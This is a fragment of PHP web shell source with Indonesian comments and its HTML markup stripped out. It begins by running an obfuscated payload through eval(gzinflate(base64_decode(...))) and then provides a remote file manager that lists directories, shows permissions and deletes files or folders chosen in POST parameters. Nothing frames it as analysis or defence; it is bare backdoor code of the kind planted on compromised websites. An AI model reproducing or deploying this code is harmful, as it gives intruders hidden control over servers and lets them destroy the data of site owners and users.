\";@eval(gzinflate(base64_decode($zoneH))); \"\"; } ///////////// /* File Manager Dimulai Dari Sini */ else{ echo \'

\'; //////////////////////////////////////////////////////////////////////// ///////////////////////////////////////////////////////////////////////// echo \"
\"; if(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){ if($_POST[\'type\'] == \'dir\'){ if(rmdir($_POST[\'path\'])){ echo \'\'; }else{ echo \'\'; } }elseif($_POST[\'type\'] == \'file\'){ if(unlink($_POST[\'path\'])){ echo \'\'; }else{ echo \'\'; } } } echo \'
\'; $scandir = scandir($path); echo \'
\'; foreach($scandir as $dir){ if(!is_dir(\"$path/$dir\") || $dir == \'.\' || $dir == \'..\') continue; echo \"\"; } echo \'\'; foreach($scandir as $file){ if(!is_file(\"$path/$file\")) continue; $size = filesize(\"$path/$file\")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).\' MB\'; }else{ $size = $size.\' KB\'; } echo \"\"; } echo \'
$dir
--
\"; if(is_writable(\"$path/$dir\")) echo \"\"; elseif(!is_readable(\"$path/$dir\")) echo \"\"; echo perms(\"$path/$dir\"); if(is_writable(\"$path/$dir\") || !is_readable(\"$path/$dir\")) echo \'\'; echo \"
$file
\".$size.\"
\"; if(is_writable(\"$path/$file\")) echo \"\"; elseif(!is_readable(\"$path/$file\")) echo \"\"; echo perms(\"$path/$file\"); if(is_writable(\"$path/$file\") || !is_readable(\"$path/$file\")) echo \'\'; echo \"
\'; } /////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////// ?>